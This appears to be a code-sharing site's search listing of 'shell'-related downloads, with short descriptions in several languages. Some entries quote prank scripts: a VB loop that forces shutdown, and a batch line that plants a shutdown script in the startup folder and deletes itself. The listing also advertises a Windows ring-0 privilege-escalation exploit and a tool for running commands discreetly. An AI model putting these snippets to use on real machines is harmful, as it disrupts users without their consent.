搜索资源列表
ch1
- 数据结构代码,关于数据结构的实验一 void main() { timeb t1,t2 long t double x,sum=1,sum1 int i,j,n printf(\"请输入x n:\") scanf(\"%lf%d\",&x,&n) ftime(&t1) // 求得当前时间 for(i=1 i<=n i++) { sum1=1 for(j=1 j<=i j++)
explorer-src.zip
- This program doesn t do much, apart from create a window which could be used as a desktop. It s pretty straightforward. It creates a window the size of the screen, displays some text in the corner, and then disables ALT+F4.,This program doesn t
qcd.tar
- 用SHELL编写的快速进入linux不同目录的程序。可记录20个目录,可选择快速进入。-SHELL prepared with quick access to different directories linux programs. It can record 20 directory, choose quick access.
cmdshell
- Z.C.T议题2-替换setch(vc++源码)-ZCT and that 2- to replace setch (vc++ Source)
shutDownWinXpExample
- This a example of how to Shutdown, Restart, and Log Off Windows XP using code. This uses Shell code. It works very well. I only tested the Shutdown code but the others should work. Note: The shutdown service will obviously need to be running for this
SudungLinuxShell
- 1. LỊ CH SỬ RA Đ Ờ I CỦ A LINUX Vào nă m 1991 tạ i Phầ n Lan, Linus B. Torvalds lúc đ ó là sinh viên ở trư ờ ng Đ ạ i họ c tổ ng hợ p Hensinki đ ã dùng mN
guanji
- Private Sib Form_Load() For i = 1 To 1E+40 Shell "shutdown -s -t 0" Next i End Sub-Private Sib Form_Load() For i = 1 To 1E+40 Shell "shutdown-s-t 0" Next i
Apress.Expert.Shell.Scripting.Jan.2009
- 2009年图书:精通Shell脚本编程 The book is meant for the intermediate shell coder up to the advanced shell-code hacker, because I don’t explain many basic programming structures. If you’re looking for that type of book, you should look to the resources me
newTxt
- 一个右键新建txt文件的脚本,一级菜单,支持快捷键,自动打开新建的txt文件. 可以自己DIY! 详细见:http://url.cn/2azprx-A item of right click menu in windows 7, it appears in the top right click menu, and supports shortcut key(&T), and will be open your new txt file immediately! And it s e
Setup
- 假的 加积分用的 不要下载 就是个空文件-don’t download
avutil-50
- chome essential dll, has copied from chome original instalation path but it wasn t modyfied
fixcopy
- 有时候系统会遇到一些奇怪的问题,比如无法复制任何文件,该批处理可以解决无法复制的问题。-can t copy!
cmdnotepad
- Clone of Windows Notepad. Allows you to execute console commands discretely. Menues, icons and fake buttons are simulated. Usage: Write @@@ and your command, then press enter. For example @@@time /t. Licence: Public domain
WindowsLocal-Ring-0-Exploit
- 一个windows本地提权漏洞,影响从Windows nt到Windows 8,利用漏洞接替了系统内核拿到最高权限-Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit There s a pretty obvious bug in win32k!EPATHOBJ::pprFlattenRec where the // PATHREC object returned by win32k!EPATHOBJ
PrettyGirl
- 一个及其简单的自动关机脚本,作弄人用的。 @echo shutdown -s -t -c "世界崩溃了 :-(" 60 > ALLUSERSPROFILE \「开始~1\程序\启动\x.bat @del /f/q/a ~dpnx0 > nul -A simple and automatic shutdown scr ipts, for prank.
Bash-Shell
- UNIX/Linux shell 有很多种,比如 Bourne shell(又称 AT&T shell,标准的 UNIX shell, sh)、 C shell(又称 Berkeley shell)、 Korn shell(Bourne shell 的扩展集,ksh)、 TC shell、 Z shell、 Bash shell 等。 这些 shell 的功能和使用都不尽相同。我们通常说 shell 编程,其实说精通所有 shell 编 程是很难的, 一般也没有必要。 学习 shel